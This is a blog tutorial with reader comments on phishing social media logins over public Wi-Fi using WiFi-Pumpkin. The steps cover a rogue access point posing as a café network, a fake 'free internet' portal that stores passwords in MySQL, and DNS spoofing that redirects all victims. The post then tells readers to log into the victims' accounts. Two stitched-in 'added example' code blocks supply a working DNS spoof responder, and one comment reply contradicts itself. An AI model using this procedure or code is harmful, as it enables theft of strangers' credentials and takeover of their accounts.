MITM – Hacking With WiFi-Pumpkin

December 30, 2016 | Views: 28566


Hi, and welcome to the "man in the middle" hacking with WiFi-Pumpkin tutorial.

This tutorial shows how to capture user credentials (social media logins) with a tool called WiFi-Pumpkin on ParrotSec, using a custom fake login page. Everything below has been tested on ParrotSec (a Linux distribution for pentesting) with the WiFi-Pumpkin tool; Kali Linux works just as well as the base operating system.

Here are the links for Parrotsec and Wifi-Pumpkin

Besides the application, you also need an external Wi-Fi card that supports AP (access point) mode. I recommend the TP-Link TL-WN722N; it has proven to work with all sorts of Wi-Fi attacks. Check the hardware version on the label, though: the v1 card uses an Atheros chipset with good Linux driver support, while later revisions use a different Realtek chipset that is widely reported not to work for this. Before relying on any card, confirm that "AP" appears under "Supported interface modes" in the output of "iw list". So, for example, if you are performing this attack at a "Starbucks", your internal Wi-Fi card is connected to their network and your external card is used as the rogue AP.
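The check a practitioner wants before buying or plugging in a card is whether the kernel driver actually exposes AP mode. The following is an added example, not part of the original tutorial or of WiFi-Pumpkin: it parses the output of "iw list" (from the iw package) and reports which PHYs list "AP" under "Supported interface modes". A constructed sample of that output is embedded so it runs offline; run it with --live to query the real adapters.

```python
# Added example: verify that a Wi-Fi PHY supports AP mode by parsing
# `iw list`.  Not code from the tutorial or from WiFi-Pumpkin.
import re
import subprocess
import sys

# Constructed sample of `iw list` output: phy1 can do AP, phy0 cannot.
SAMPLE_IW_LIST = """\
Wiphy phy1
    max # scan SSIDs: 4
    Supported interface modes:
         * IBSS
         * managed
         * AP
         * AP/VLAN
         * monitor
         * P2P-client
         * P2P-GO
    Band 1:
        Capabilities: 0x11ce
Wiphy phy0
    max # scan SSIDs: 20
    Supported interface modes:
         * managed
    Band 1:
        Capabilities: 0x1062
"""


def parse_interface_modes(iw_output):
    """Return {phy_name: set(modes)} from `iw list` text."""
    phys = {}
    current = None
    in_modes = False
    for line in iw_output.splitlines():
        m = re.match(r"^Wiphy (\S+)", line)
        if m:
            current = m.group(1)
            phys[current] = set()
            in_modes = False
            continue
        if current is None:
            continue
        stripped = line.strip()
        if stripped.startswith("Supported interface modes:"):
            in_modes = True
            continue
        if in_modes:
            if stripped.startswith("* "):
                phys[current].add(stripped[2:].strip())
            else:
                in_modes = False   # first non-bullet line ends the mode list
    return phys


def ap_capable_phys(iw_output):
    """Sorted names of PHYs whose mode list contains AP."""
    modes_by_phy = parse_interface_modes(iw_output)
    return sorted(p for p, modes in modes_by_phy.items() if "AP" in modes)


def main(argv):
    if "--live" in argv:
        text = subprocess.run(["iw", "list"], capture_output=True,
                              text=True, check=True).stdout
    else:
        text = SAMPLE_IW_LIST
    for phy, modes in parse_interface_modes(text).items():
        status = "OK " if "AP" in modes else "NO "
        print(f"{status}{phy}: {', '.join(sorted(modes))}")
    capable = ap_capable_phys(text)
    if not capable:
        print("no adapter supports AP mode; a rogue AP cannot be started")
        return 1
    print("AP-capable:", ", ".join(capable))
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv[1:]))
```

Run it as root with --live on the box that will host the rogue AP; the PHY that lists AP is the one to pick as the network adapter in WiFi-Pumpkin's settings. A card that only lists "managed" will connect to networks fine but cannot be used for this attack.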

What this tutorial will not cover is the installation of ParrotSec or Kali Linux. Please find the installation documentation on their respective websites. ParrotSec can be installed in a VMware virtual machine or as the main operating system; the choice is entirely up to you. Please note that you need some knowledge of VMware and of the Linux operating system.

I will assume you have either Kali or ParrotSec running. Next, we need to install WiFi-Pumpkin. The installation of this tool is really straightforward; type these commands in your terminal:

 git clone https://github.com/P0cL4bs/WiFi-Pumpkin.git
 cd WiFi-Pumpkin
 ./installer.sh --install

If you run into errors while installing, please refer to their website for a solution. The usual reason for an incomplete installation is that your Linux is missing some of the dependencies.
Once the installation completes, run "sudo wifi-pumpkin" in the terminal. A nice GUI application pops up, and all your hacking is done right there: you don't need to open another terminal and run painstaking commands to make it work.

WiFi-Pumpkin comes with loads of modules and plugins. For this tutorial I will concentrate on the Rogue AP, the Phishing Manager module and the DNS Spoof module.
Before we start hacking with this awesome tool, there are a few more things to do. We need to download the custom fake portal from the fake-portal link, then unzip the files into the web server folder, which is normally /var/www or /var/www/html.

Next, we need to make sure MySQL has the right database and table for the fake portal. MySQL and Apache usually come pre-installed on Kali and ParrotSec; if not, follow the installation procedure on my fake-portal link.

Open a terminal and type "mysql -u root" to get a MySQL console. Create a database (the name rogue_AP can be anything you like, just write it down for later), switch to it, and create the table the portal writes its captured logins to:

 mysql -u root
 create database rogue_AP;
 use rogue_AP;
 create table social_login(socialn varchar(64), email varchar(64), userpassword varchar(64));

That's it for the MySQL setup. Next, we need to edit a file from the archive we unzipped into /var/www/html. Open the file named "dbconnect.php" and edit this part:

 $host="localhost";                 // this is normally localhost
 $username="your mysql username";   // your MySQL username, default is root
 $password="your mysql password";   // your MySQL password
 $db_name="rogue_AP";               // the database name you created
 $tbl_name="social_login";          // leave this as default

Once done, make sure MySQL is running by restarting it with "sudo /etc/init.d/mysql restart".

*Please note: if you have not set a MySQL root password yet, set it first, since the portal connects with that username and password. You can follow this guide to set it up:

https://ubuntu.flowconsult.at/en/mysql-set-change-reset-root-password/

A brief introduction on WiFi-Pumpkin

WiFi-Pumpkin is basically a MITM tool. The victim connects to the rogue AP and, once connected, is shown a fake portal. There the victim is tricked into logging in with a social media account in order to get the so-called "free internet".

Note that the portal and its database never talk to the real social media sites, so nothing verifies whether the captured credentials are genuine. The only way to verify them is to try the captured credentials against the respective social media site.

Now that everything is set up and ready to go, launch WiFi-Pumpkin. In the "settings" menu set your "Gateway" IP address (your router IP), set the "SSID" to whatever you like, for example "starbucks", and choose the network adapter for the rogue AP (wlan0 or wlan1, whichever is the external card). Set the IP address range handed out to clients; make sure it does not overlap with the range of the network your internal card is connected to (if the upstream network is a 192.168.x.x range, a 10.0.0.x range is a safe choice). Save the settings.

Under the "plugins" menu untick "enable proxy server". Start the access point by clicking Start. Next, go to "modules", select "phishing manager", and under options choose "set directory". Set the IP address to 10.0.0.1 and "SetEnv Path" to the fake-portal files you unzipped to /var/www/html, then start the server. The phishing server binds to that address, so the AP must already be running and holding 10.0.0.1 on its interface; starting the server first fails with "Cannot assign requested address".

Next go to "modules" and open "DNS::spoof". Remove any URL in there (right-click, clear all), select "redirect traffic from all users", and start the attack. Then under "view" select "monitor NetCreds" and click "capture logs". Keep in mind that DNS spoofing only lands the victim on the portal for plain HTTP requests; a request to an HTTPS site fails its certificate check instead of showing the fake page.
When a victim connects to the rogue AP and logs in through the portal, you will see the credentials here, and also on the main panel under "activity-monitor".
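To make clear what the DNS::spoof step does under the hood, here is an added example, not code from the tutorial or from WiFi-Pumpkin: the rogue AP is the DNS server in the victim's DHCP lease, so every lookup arrives at the AP, and the spoofer answers each A query with the portal address. The code parses a raw DNS query in RFC 1035 wire format, builds the spoofed reply, and reads it back the way a client would. The query bytes are constructed inline (no socket is opened), and 10.0.0.1 as the portal address is an assumption taken from the settings above.

```python
# Added example (not WiFi-Pumpkin code): the wire-level effect of DNS
# spoofing on one lookup.  Query bytes are constructed inline.
import socket
import struct

PORTAL_IP = "10.0.0.1"   # assumption: the AP/portal address from the tutorial


def encode_name(name):
    """'www.example.com' -> b'\\x03www\\x07example\\x03com\\x00'."""
    out = b""
    for label in name.rstrip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def decode_name(data, offset):
    """Read a possibly compressed name; return (name, offset after it)."""
    labels, end, jumped = [], None, False
    while True:
        length = data[offset]
        if length & 0xC0 == 0xC0:                   # compression pointer
            if not jumped:
                end = offset + 2
            offset = struct.unpack("!H", data[offset:offset + 2])[0] & 0x3FFF
            jumped = True
            continue
        offset += 1
        if length == 0:
            return ".".join(labels), (end if jumped else offset)
        labels.append(data[offset:offset + length].decode("ascii"))
        offset += length


def build_query(name, qtype=1, txid=0x1234):
    """A query as a stub resolver sends it: RD set, one question, class IN."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", qtype, 1)


def parse_query(packet):
    """Return (txid, qname, qtype, qclass) of the first question."""
    txid, flags, qdcount = struct.unpack("!HHH", packet[:6])
    if flags & 0x8000 or qdcount < 1:
        raise ValueError("not a DNS query")
    qname, off = decode_name(packet, 12)
    qtype, qclass = struct.unpack("!HH", packet[off:off + 4])
    return txid, qname, qtype, qclass


def spoofed_response(query, answer_ip=PORTAL_IP, ttl=60):
    """Reply to an A/IN query with answer_ip; other types get None (not spoofed)."""
    txid, qname, qtype, qclass = parse_query(query)
    if (qtype, qclass) != (1, 1):
        return None
    question = encode_name(qname) + struct.pack("!HH", qtype, qclass)
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)   # QR, RD, RA; 1 answer
    rdata = socket.inet_aton(answer_ip)
    # NAME = pointer to the question at offset 12, TYPE A, CLASS IN, TTL, RDLENGTH
    answer = struct.pack("!HHHIH", 0xC00C, 1, 1, ttl, len(rdata)) + rdata
    return header + question + answer


def parse_response(packet):
    """Return (txid, qname, [A-record IPs]) the way a client would read it."""
    txid, _flags, _qd, an = struct.unpack("!HHHH", packet[:8])
    qname, off = decode_name(packet, 12)
    off += 4                                       # QTYPE + QCLASS
    ips = []
    for _ in range(an):
        _, off = decode_name(packet, off)
        rtype, _rclass, _ttl, rdlen = struct.unpack("!HHIH", packet[off:off + 10])
        off += 10
        if rtype == 1:
            ips.append(socket.inet_ntoa(packet[off:off + rdlen]))
        off += rdlen
    return txid, qname, ips


if __name__ == "__main__":
    victim_lookup = build_query("www.facebook.com")       # constructed sample
    print(parse_response(spoofed_response(victim_lookup)))
```

The reply echoes the victim's transaction ID and question, which is all a stub resolver checks, so the browser then opens a TCP connection to 10.0.0.1 and the phishing server answers with the portal. This is also why the technique stops at HTTPS: the connection reaches the portal, but the certificate it can present is not the one the browser expects for the spoofed name.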

And that's it! Once done, stop all the servers. Use the captured credentials to try to log in to the social media account the victim selected on the fake portal, for example Facebook.

WiFi-Pumpkin is an excellent tool for MITM and a well-maintained one compared to mana-toolkit or the other MITM tools out there. Try the other plugins and modules in there and keep learning and hacking!

Good Luck.


Like this article? Try this one, “Evil Twin Access Point | Wifi-Pumpkin

34 Comments
  1. For those who are interested in a complete video tutorial, please visit :

    https://www.youtube.com/watch?v=mnwiKlxEud0

  2. Followed the tutorial but when I start server I get failed to listen to 10.0.0.1:80 (reason: Cannot assign requested address.) Any help please mate.

  3. First of all, thanks for the great post Knightblood.

    I am having an issue with the Phishing Manager.

    My fake AP is working well, I can connect to it with my phone and I am able to use the internet. I then start up the DNS Spoofer, placing my gateway IP in the 'gateway' box and it redirects to whichever IP I request it to. I also get updates of websites I have tried to connect to in the 'DNS::Requests' in the DNS Spoofer.

    Now, when I put the same IP address in Phishing Manager, the internet stops working and ‘This site can’t be reached’ appears on any site I try to visit on my phone.

    I have tried changing the port but it hasn't made any difference so I put it back to 80. There are no errors appearing in the terminal nor in the phishing manager 'requests' box. I have tried various IP addresses and switched between the 'index.html' and 'set directory' options but still no luck.

    Can you think of what could be causing this problem and advise on how to fix it?

    Thanks in advance,

    H

    • Hi, are you trying to view an https website? This tutorial will not work if you are trying to visit a http website, it will not display any page.

      On the other hand I've done a complete video tutorial (6 part video tutorial) which will be up soon. I will update it once it's up. You should be able to follow the tutorial and get it running.


